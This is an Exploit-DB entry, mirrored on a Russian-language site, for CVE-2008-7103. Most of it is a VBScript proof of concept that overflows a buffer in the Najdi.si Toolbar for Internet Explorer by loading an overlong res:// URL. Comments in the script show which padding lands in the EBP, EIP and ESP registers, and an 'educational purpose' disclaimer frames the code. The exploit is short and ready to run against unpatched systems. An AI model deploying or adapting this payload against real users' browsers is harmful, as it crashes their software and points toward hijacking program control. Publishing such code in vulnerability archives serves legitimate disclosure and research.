- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6327
- Проверка EDB
-
- Пройдено
- Автор
- SHINNAI
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2008-7103
- Дата публикации
- 2008-08-29
HTML:
-----------------------------------------------------------------------------
Najdi.si Toolbar Remote Buffer Overflow
url: http://www.najdi.si/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on:
Windows XP Professional SP2 with Internet Explorer 6 and 7
Windows XP Professional SP3 with Internet Explorer 6 and 7
Windows 2k Professional SP4 with Internet Explorer 6
Windows Server 2003 SP2 with Internet Explorer 7
-----------------------------------------------------------------------------
<script language='vbscript'>
mUrl = "res://" + String(260, "a") + "bb" + "cc" + String(512, "d") + "/"
' "bb" => see EBP
' "cc" => see EIP
' "ddd..." => see ESP
Document.Location = mUrl
</script>
# milw0rm.com [2008-08-29]
- Источник
- www.exploit-db.com